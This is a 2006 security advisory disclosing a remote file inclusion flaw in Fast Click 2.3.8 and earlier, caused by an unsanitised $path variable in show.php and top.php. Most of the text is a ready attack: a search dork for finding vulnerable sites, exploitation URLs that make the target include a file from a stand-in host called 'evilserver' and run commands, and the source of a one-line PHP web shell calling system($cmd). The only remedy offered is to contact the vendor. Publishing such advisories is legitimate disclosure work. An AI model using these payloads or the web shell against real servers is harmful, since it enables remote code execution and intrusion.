fastclick238.txt

`Fast Click <= 2.3.8 Remote File Inclusion  
-------------------------------------------------------  
Aria-security.com advisory  
Bug Discovered by R@1D3N (amin emami)  
email:[email protected] and [email protected]  
Date:02/05/2006  
original advisory:http://www.aria-security.net/advisory/fc/fastclick.txt  
--------------------------------------------------------  
Affected software description:  
Fast Click <= 2.3.8  
Vendor:http://www.ftrain.siteburg.com/fclicksqlpro/fclick.php?fclick  
Vulnerability: remote file inclusion  
Dork:inurl:"fclick.php?fid"  
---------------------------------------------------------  
Disscution:  
The problem exists is in the files "show.php" and "top.php" when include the  
variable $Path  
Vulnerable Code:  
include($path."cfg.php")  
  
Exploitation example:  
http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a  
http://[target].com/[path]/top.php?path=http://evilserver/cmd.gif?&cmd=uname -a  
  
---------------------------------------------------------  
cmd.gif  
-----------  
<?  
system($cmd);  
?>  
-----------  
  
* Fix *:  
  
Contact the Vendor  
  
  
===========================================================  
Aria Security Research  
Http://www.aria-security.net  
  
  
  
  
  
  
  
  
`